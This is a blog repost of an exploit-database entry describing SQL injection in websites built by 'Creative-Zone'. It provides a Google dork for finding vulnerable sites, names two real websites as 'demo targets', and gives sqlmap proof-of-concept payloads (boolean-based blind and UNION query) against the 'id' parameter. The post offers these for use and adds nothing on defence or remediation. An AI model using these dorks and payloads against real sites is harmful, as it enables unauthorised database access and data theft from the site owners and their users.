Search

Exploit DESIGNED & DEVELOPED BY : CREATIVE-ZONE SQL Injection Tested BackBox GNU/Linux

GhostGTR666 3:52 PM

Information Exploit

# Exploit Title :
DESIGNED & DEVELOPED BY : CREATIVE-ZONE SQL Injection
# Google Dork : inurl:/about.php?id= | inurl:/Home.php?id=
# Date : 2020.05.05
# Exploit Author : Bl4ck M4n - cxsecurity.com
# Vendor Homepage : http://www.soccerexporter.com
# Software Link : -
# Version : -
# Tested on : BackBox 6
# CVE : N/A

Demo Target :
http://www.soccerexporter.com/about.php?id=5[SQL injection]
https://www.kindyrooindonesia.com/about.php?id=1[SQL injection]

Exploit Poc SQLMap :
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=5' AND 9436=9436 AND 'Tcea'='Tcea
Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: id=-5284'

Example Vulnerability Site



Example



Video Tutorial


Thanks You...

Sumber : [cxsecurity]
Tags

Post a Comment

0 Comments

Emoji
(y)
:)
:(
hihi
:-)
:D
=D
:-d
;(
;-(
@-)
:P
:o
:>)
(o)
:p
(p)
:-s
(m)
8-)
:-t
:-b
b-(
:-#
=p~
x-)
(k)